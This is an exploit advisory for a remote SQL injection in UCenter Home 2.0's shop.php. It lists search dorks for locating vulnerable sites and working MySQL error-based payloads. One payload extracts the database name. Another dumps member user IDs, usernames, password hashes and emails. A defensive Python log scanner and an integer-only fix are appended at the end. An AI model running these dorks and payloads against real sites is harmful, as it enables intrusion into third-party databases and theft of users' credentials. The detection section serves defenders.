__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout

*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers

*/ Contact: knockoutr@msn.com

*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home

Version : 2.0

Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view

Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php

Values : (?)ac=view&shopid=

Vulnerable Style : SQL Injection (MySQL Error Based)

Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

Edit the DB name : `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
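
For defenders, an added detection example (not part of the original advisory): it scans web access-log lines for shop.php?ac=view requests whose shopid is not a plain integer and names the error-based markers seen in the requests above. The log lines are constructed samples, the function names are hypothetical, and it assumes shopid is always a numeric ID.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Markers of the MySQL error-based technique shown in the advisory.
MARKERS = [
    ("floor(rand(", re.compile(r"floor\s*\(\s*rand\s*\(", re.I)),
    ("information_schema", re.compile(r"information_schema", re.I)),
    ("group by", re.compile(r"group\s+by", re.I)),
    ("uc_members", re.compile(r"uc_members", re.I)),
]
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format, documentation IP range).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20'
    'from(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a) HTTP/1.1" 200 812',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /shop.php?ac=view&shopid=253%27 HTTP/1.1" 200 640',
    '203.0.113.4 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php HTTP/1.1" 200 900',
]

def classify_request(log_line):
    """Return (verdict, markers): 'ignore', 'ok', 'suspect' or 'sqli'."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return "ignore", []
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/shop.php"):
        return "ignore", []
    params = parse_qs(url.query, keep_blank_values=True)  # also percent-decodes
    if params.get("ac", [""])[0] != "view" or "shopid" not in params:
        return "ignore", []
    shopid = params["shopid"][0]
    if re.fullmatch(r"[0-9]+", shopid):
        return "ok", []          # the only form a legitimate ID should take
    hits = [name for name, rx in MARKERS if rx.search(shopid)]
    return ("sqli" if hits else "suspect"), hits

def scan(lines):
    """Return [(line_number, verdict, markers)] for every non-integer shopid."""
    out = []
    for n, line in enumerate(lines, 1):
        verdict, hits = classify_request(line)
        if verdict in ("suspect", "sqli"):
            out.append((n, verdict, hits))
    return out

if __name__ == "__main__":
    for row in scan(SAMPLE_LOG):
        print(row)
```

The same integer-only rule is the fix on the application side: a shopid that is cast to an integer or bound as a query parameter never reaches the SQL parser as text.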